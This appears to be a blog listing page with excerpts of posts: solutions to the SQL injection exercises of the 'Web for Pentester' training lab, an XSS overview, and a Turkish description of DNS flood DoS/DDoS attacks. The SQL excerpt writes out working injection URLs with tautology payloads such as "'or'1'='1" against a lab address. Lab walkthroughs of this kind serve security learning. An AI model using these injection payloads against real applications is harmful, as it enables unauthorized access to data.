Web for Pentester -1 SQL Solutions

Example -1 Quote! If we inject a single quote, using ?name=root', the table disappears. We probably broke something... http://172.16.138.193/sqli/example1.php?name=root'%20or%20'1'='1 Example -2 ERROR SPACE http://172.16.138.193/sqli/example2.php?name=root'or'1'='1 Example -3 Comments! http://172.16.138.193/sqli/example3.php?name=root'//or//'1'='1 Example -4 Dot! I add “.” at the beginning of the URL. Also, you can add “.” or “-” ...etc. http://172.16.138.193/sqli/example4.php?id=.2 or 1=1 Example – 5&6 Error … Continue reading Web for Pentester -1 SQL Solutions

Advertisements

Web for Pentester-1 XSS Solutions

XSS (Cross-site Scripting) Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that … Continue reading Web for Pentester-1 XSS Solutions

DNS’e Yönelik DoS ve DDoS Saldırıları

DNS Flood DoS/DDoS Saldırıları Bu saldırı tipi genelde iki şekilde gerçekleştirilir: Hedef DNS sunucuya kapasitesinin üzerinde (bant genişliği olarak değil) DNS istekleri göndererek, normal isteklere cevap veremeyecek hale gelmesini sağlamak Hedef DNS sunucu önündeki Firewall/IPS’ in “session” limitlerini zorlayarak Firewall arkasındaki tüm sistemlerin erişilemez olmasını sağlamak Her iki yöntem için de ciddi oranlarda DNS sorgusu … Continue reading DNS’e Yönelik DoS ve DDoS Saldırıları